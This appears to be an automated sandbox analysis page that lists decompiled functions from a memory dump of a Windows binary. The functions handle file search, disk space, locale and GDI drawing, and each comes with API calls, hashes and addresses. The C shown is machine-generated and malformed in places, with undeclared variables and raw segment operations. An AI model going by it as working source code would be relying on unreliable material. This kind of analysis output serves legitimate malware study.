Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 77f62c95fb7e918c7d2009dbccb762d56bc75d5de92aab2a442e831bd1390d5b
Instruction ID: 65eea9cc501be0bab24ed8d79dc14c6897f0298a4fc65be17d77a0b2f403ab22
Opcode Fuzzy Hash: 77f62c95fb7e918c7d2009dbccb762d56bc75d5de92aab2a442e831bd1390d5b
Instruction Fuzzy Hash: 51F0F671E043047BEB00EBB2CC4299EB36FDBC4718F90C47AB610B35C0EA7C65108654

Uniqueness

Uniqueness Score: -1.00%

Function 00408938, Relevance: 3.0, APIs: 2, Instructions: 33
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408938(void* __eax, WORD* __ecx, signed int __edx) {
				WORD* _t15;
				void* _t21;
				long _t22;

				_t15 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
				_t21 = FindFirstFileA(E004047D0(__eax), __ecx + 0x18);
				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
				if(_t21 == 0xffffffff) {
					_t22 = GetLastError();
				} else {
					_t22 = E004088D4(_t15);
					if(_t22 != 0) {
						E004089AC(_t15);
					}
				}
				return _t22;
			}

0x0040893b
0x00408944
0x00408958
0x0040895a
0x00408960
0x0040897d
0x00408962
0x00408969
0x0040896d
0x00408971
0x00408971
0x0040896d
0x00408984

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,?,004684CE,00000000,00468648,?,00000000,00468670), ref: 00408953
GetLastError.KERNEL32(00000000,?,?,?,?,004684CE,00000000,00468648,?,00000000,00468670), ref: 00408978

Part of subcall function 004088D4: FileTimeToLocalFileTime.KERNEL32(?), ref: 00408901
Part of subcall function 004088D4: FileTimeToDosDateTime.KERNEL32 ref: 00408910

Part of subcall function 004089AC: FindClose.KERNEL32(?,?,00408976,00000000,?,?,?,?,004684CE,00000000,00468648,?,00000000,00468670), ref: 004089B8

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$Find$CloseDateErrorFirstLastLocal
String ID:
API String ID: 976985129-0
Opcode ID: 1e288328fed181064df11d7fb29f27d6540e8c9e6fc1a6b65a63f4393e9c87ad
Instruction ID: a4c810d5daf1d518932f7d09b08806f352e8784f0defa3d5e028af5794bd5699
Opcode Fuzzy Hash: 1e288328fed181064df11d7fb29f27d6540e8c9e6fc1a6b65a63f4393e9c87ad
Instruction Fuzzy Hash: ACE065B3B0112017C7147E6E5D8196B61984A847A8709427FB995FB3D6DE3CCC1143DA

Uniqueness

Uniqueness Score: -1.00%

Function 00408B02, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B02(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E004052B0(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E004052B0(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

0x00408b0b
0x00408b10
0x00408b12
0x00408b12
0x00408b25
0x00408b34
0x00408b37
0x00408b44
0x00408b47
0x00408b4c
0x00408b4f
0x00408b51
0x00408b5e
0x00408b61
0x00408b66
0x00408b69
0x00408b6b
0x00408b74

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408B25

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: e0983e28c4aea409309b8b571afeaab98e811c969ab897b82128a6dfb64f703a
Instruction ID: 3bce85ac5653d17904fca8f9c876949c4192ad64dac41f5d0a902c7bea582b35
Opcode Fuzzy Hash: e0983e28c4aea409309b8b571afeaab98e811c969ab897b82128a6dfb64f703a
Instruction Fuzzy Hash: 891100B5E01609AFDB00CF99C8819AFB7F9EFC8304B14C569A505E7254E6319E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0042E8BC, Relevance: 1.5, APIs: 1, Instructions: 41
nativeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0042E8BC(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L00406D08();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x42e8f6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E004037B0(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}

0x0042e8c5
0x0042e8c8
0x0042e8ca
0x0042e8d0
0x0042e914
0x0042e918
0x0042e919
0x0042e91d
0x0042e920
0x0042e921
0x0042e926
0x00000000
0x0042e926
0x0042e8d5
0x0042e8da
0x0042e8dd
0x0042e8e7
0x0042e8ee
0x0042e8f1
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042E921

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 5fd91e4882b7d4b51eaa1c6e2a319d28cb952b6fd541d4587ae446bb00d3fdec
Instruction ID: a99603b4774d403f5c425303500a1d107946dd2ed8f098ff2a7340b667ae1876
Opcode Fuzzy Hash: 5fd91e4882b7d4b51eaa1c6e2a319d28cb952b6fd541d4587ae446bb00d3fdec
Instruction Fuzzy Hash: FDF0F6B6704214AFDB40DF9BE881C56BBECEB0932039140B7F904D7341D235AD009B74

Uniqueness

Uniqueness Score: -1.00%

Function 00420B24, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00420B24(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}

0x00420b2a
0x00420b2d
0x00420b30
0x00420b34
0x00420b39
0x00420b3f
0x00420b40
0x00420b4a
0x00420b5d
0x00420b66
0x00420b6e
0x00420b71
0x00420b71
0x00000000
0x00000000
0x00000000
0x00000000
0x00420b4c
0x00420b4c
0x00420b4f
0x00420b51
0x00420b54
0x00420b57
0x00420b57
0x00000000
0x00420b4c
0x00420b78

APIs

GetSystemInfo.KERNEL32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042410F), ref: 00420B34

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: a725acbe750598fa7dcf7ac34f2f70601eb1af39f9a3eff6cf881c1528af22a8
Instruction ID: 77e0b73c13ff2e563e634a35a7d2c13a73f4324c183021a29b3267c8cb907b35
Opcode Fuzzy Hash: a725acbe750598fa7dcf7ac34f2f70601eb1af39f9a3eff6cf881c1528af22a8
Instruction Fuzzy Hash: AFF0CD72A0011C9FCB20DED8C488C9CBFB4FA56305B8042EAC408E7342EB78A690CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00409940, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409940(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00404374(_t10, _t18);
				}
				return E00404410(_t10, _t5 - 1,  &_v260);
			}

0x0040994b
0x0040994d
0x00409965
0x00000000
0x0040997d
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040995E

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 601acd154a8726646306cb7902fb679922c22feea1ffdd8a371958e4f1bb7313
Instruction ID: b0e6d8d5d631d164689d9758e55eafa877a85ca348b557507cc080045d280286
Opcode Fuzzy Hash: 601acd154a8726646306cb7902fb679922c22feea1ffdd8a371958e4f1bb7313
Instruction Fuzzy Hash: A0E092B270021416D310A5595C82EEAB25CA798354F00427FBE45E73D2EDB49E8086E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040998C, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040998C(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}

0x0040998f
0x00409990
0x004099a6
0x004099ad
0x004099a8
0x004099a8
0x004099a8
0x004099b3

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B002,00000000,0040B21B,?,?,00000000,00000000), ref: 0040999F

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 30b854cd48461b27ede31c3797ada21d26d2e7b65f28032653e8630c86dddf53
Instruction ID: c3187cab53ebb56b3c59762355c8a62df768741a76e81424565258229681cb70
Opcode Fuzzy Hash: 30b854cd48461b27ede31c3797ada21d26d2e7b65f28032653e8630c86dddf53
Instruction Fuzzy Hash: 3CD05EA631E2502AE210615A2D85DBB5BACCAC57A1F10403EB588D6382D2288C06D3B6

Uniqueness

Uniqueness Score: -1.00%

Function 0040703E, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040703E() {

				goto ( *0x490558);
			}

0x00407040

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ee5d47ace2b2fd4937d3b555c45ae1a41de6232810b8eec9b3d31809db5446
Instruction ID: ea13d304944b2c0951bb2872d28567620e2b23670e64cbf9492c260b541986fc
Opcode Fuzzy Hash: d9ee5d47ace2b2fd4937d3b555c45ae1a41de6232810b8eec9b3d31809db5446
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004207E0, Relevance: 37.7, APIs: 25, Instructions: 248
windowCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E004207E0(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x48e854; // 0x4710ac
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L00406A60();
					_v20 = E0042063C(0);
					_push(_t177);
					_push(0x420a60);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L00406A58();
					_v24 = E0042063C(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x48fa28; // 0xab0806ee
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L00406BD8();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L00406BD8();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x48fa28; // 0xab0806ee
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L00406BD8();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L00406BD8();
						_v40 = _t135;
					}
					_push(_v20);
					L00406BA8();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(E00420A67);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L00406BD8();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L00406A58();
					_v24 = E0042063C(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x4208b3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407254(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(E00420A67);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}

0x004207e1
0x004207e3
0x004207e9
0x004207ec
0x004207ef
0x004207f1
0x004207f4
0x004207f7
0x004207fb
0x00420803
0x004208bc
0x004208bf
0x004208c1
0x004208cb
0x004208d0
0x004208d1
0x004208d6
0x004208d9
0x004208dc
0x004208dd
0x004208e1
0x004208e2
0x004208ec
0x004208fc
0x004208ff
0x00420901
0x00420906
0x00420907
0x0042090a
0x0042090b
0x00420910
0x00420913
0x00420918
0x0042091c
0x0042091d
0x00420926
0x0042093c
0x0042093e
0x00420943
0x00420944
0x00420947
0x00420948
0x0042094d
0x00420928
0x00420928
0x0042092d
0x0042092e
0x00420931
0x00420932
0x00420937
0x00420937
0x00420953
0x00420954
0x00420976
0x00420998
0x004209a5
0x004209b3
0x004209da
0x004209ff
0x00420a09
0x00420a13
0x00420a1c
0x00420a26
0x00420a26
0x00420a2f
0x00420a36
0x00420a39
0x00420a3c
0x00420a45
0x00420a47
0x00420a4c
0x00420a50
0x00420a51
0x00420a51
0x00420a5f
0x0042081b
0x0042081b
0x0042081d
0x00420822
0x00420823
0x0042082d
0x0042083d
0x00420842
0x00420843
0x00420848
0x0042084b
0x00420887
0x0042088e
0x00420891
0x00420894
0x004208a6
0x004208b2
0x004208b2

APIs

7378A520.GDI32(?,00000001,00000001,00000000,?,?), ref: 00420823
SelectObject.GDI32(?,?), ref: 00420838
MaskBlt.GDI32(?,?,?,?,?,?,00000000,0041FC87,?,?,?,00000000,00000000,004208B3,?,?), ref: 00420887
SelectObject.GDI32(?,?), ref: 004208A1
DeleteObject.GDI32(?), ref: 004208AD
7378A590.GDI32(00000000,00000000,?,?), ref: 004208C1
7378A520.GDI32(?,?,?,00000000,00420A60,?,00000000,00000000,?,?), ref: 004208E2
SelectObject.GDI32(?,?), ref: 004208F7
7378B410.GDI32(?,AB0806EE,00000000,?,?,?,?,?,00000000,00420A60,?,00000000,00000000,?,?), ref: 0042090B
7378B410.GDI32(?,?,00000000,?,AB0806EE,00000000,?,?,?,?,?,00000000,00420A60,?,00000000,00000000), ref: 0042091D
7378B410.GDI32(?,00000000,000000FF,?,?,00000000,?,AB0806EE,00000000,?,?,?,?,?,00000000,00420A60), ref: 00420932
7378B410.GDI32(?,AB0806EE,000000FF,?,?,00000000,?,AB0806EE,00000000,?,?,?,?,?,00000000,00420A60), ref: 00420948
7378B150.GDI32(?,?,AB0806EE,000000FF,?,?,00000000,?,AB0806EE,00000000,?,?,?,?,?,00000000), ref: 00420954
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00420976
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,0041FC87,?,?,00440328), ref: 00420998
SetTextColor.GDI32(?,00000000), ref: 004209A0
SetBkColor.GDI32(?,00FFFFFF), ref: 004209AE
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004209DA
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 004209FF
SetTextColor.GDI32(?,0041FC87), ref: 00420A09
SetBkColor.GDI32(?,00000000), ref: 00420A13
SelectObject.GDI32(?,00000000), ref: 00420A26
DeleteObject.GDI32(?), ref: 00420A2F
7378B410.GDI32(?,00000000,00000000,00420A67,?,0041FC87,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00420A51
DeleteDC.GDI32(?), ref: 00420A5A

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
String ID:
API String ID: 2689844912-0
Opcode ID: d721cc654ccfa92d5653a33c80ae25e3b253b3d4bedada3afb9aa5f10e7419d6
Instruction ID: 5b27035095e30105dd48d7f500274a7d032aa82394eaf58720f6b8b2fee1a88d
Opcode Fuzzy Hash: d721cc654ccfa92d5653a33c80ae25e3b253b3d4bedada3afb9aa5f10e7419d6
Instruction Fuzzy Hash: 4781B2B1A00219AFDB50EEA9CD81FAF77FCAB0D714F510429F619F7281C278AD508B64

Uniqueness

Uniqueness Score: -1.00%

Function 00423F14, Relevance: 31.7, APIs: 21, Instructions: 194
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00423F14(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00423408(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x42410f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L00406E30();
					_v12 = E0042063C(0);
					_push(_v12);
					L00406A60();
					_v20 = E0042063C(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L00406A48();
					_v8 = _t64;
					if(_v8 == 0) {
						L17:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x424116);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L00407090();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L00406A60();
							_v16 = E0042063C(_v12);
							_push(_t127);
							_push(0x4240c7);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E0042384C(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L00406BD8();
								_push(_v16);
								L00406BA8();
								_push(0);
								_push(_t123);
								_push(_v20);
								L00406BD8();
								_push(_v20);
								L00406BA8();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L00406A38();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x4240ce);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}

0x00423f15
0x00423f17
0x00423f1d
0x00423f1f
0x00423f21
0x00423f25
0x00423f2a
0x0042411f
0x00423f44
0x00423f46
0x00423f4d
0x00423f52
0x00423f57
0x00423f58
0x00423f5d
0x00423f60
0x00423f63
0x00423f65
0x00423f6f
0x00423f75
0x00423f76
0x00423f80
0x00423f83
0x00423f85
0x00423f87
0x00423f8c
0x00423f8d
0x00423f90
0x00423f91
0x00423f96
0x00423f9d
0x004240e1
0x004240e1
0x004240e3
0x004240e6
0x004240e9
0x004240f2
0x004240f8
0x004240f8
0x00424101
0x00424103
0x00424106
0x00424107
0x00424109
0x00000000
0x00424109
0x0042410e
0x00423fa3
0x00423fb0
0x00423fb9
0x00423fda
0x00423fdb
0x00423fe5
0x00423fea
0x00423feb
0x00423ff0
0x00423ff3
0x00423ffa
0x0042401a
0x00423ffc
0x00423ffc
0x00424002
0x00424016
0x00424016
0x00424028
0x0042402d
0x0042402f
0x00424031
0x00424035
0x00424036
0x0042403e
0x0042403f
0x00424044
0x00424046
0x0042404a
0x0042404b
0x00424053
0x00424054
0x00424054
0x0042405e
0x00424065
0x0042406a
0x0042406c
0x00424071
0x00424075
0x00424079
0x0042407a
0x0042407c
0x00424081
0x00424082
0x0042408c
0x00424095
0x0042409f
0x0042409f
0x004240a8
0x004240ab
0x004240ab
0x004240b2
0x004240b5
0x004240b8
0x004240c6
0x00423fbb
0x00423fcd
0x004240d2
0x004240dc
0x004240dc
0x00000000
0x004240d2
0x00423fb9
0x00423f9d

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 00423F37
7378AC50.USER32(00000000,00000000,0042410F,?,00000000,?,?), ref: 00423F65
7378A590.GDI32(?,00000000,00000000,0042410F,?,00000000,?,?), ref: 00423F76
7378A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,0042410F,?,00000000,?,?), ref: 00423F91
SelectObject.GDI32(?,00000000), ref: 00423FAB
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00423FCD
7378A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042410F,?,00000000,?,?), ref: 00423FDB
SelectObject.GDI32(00000000,00000000), ref: 00424023
7378B410.GDI32(00000000,?,00000000,00000000,00000000,00000000,004240C7,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 00424036
7378B150.GDI32(00000000,00000000,?,00000000,00000000,00000000,00000000,004240C7,?,?,?,00000000,?,?,00000001,00000001), ref: 0042403F
7378B410.GDI32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,004240C7,?,?,?,00000000,?), ref: 0042404B
7378B150.GDI32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,004240C7,?,?,?,00000000), ref: 00424054
SetBkColor.GDI32(00000000,00000000), ref: 0042405E
737997E0.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,00000000,00000000,004240C7), ref: 00424082
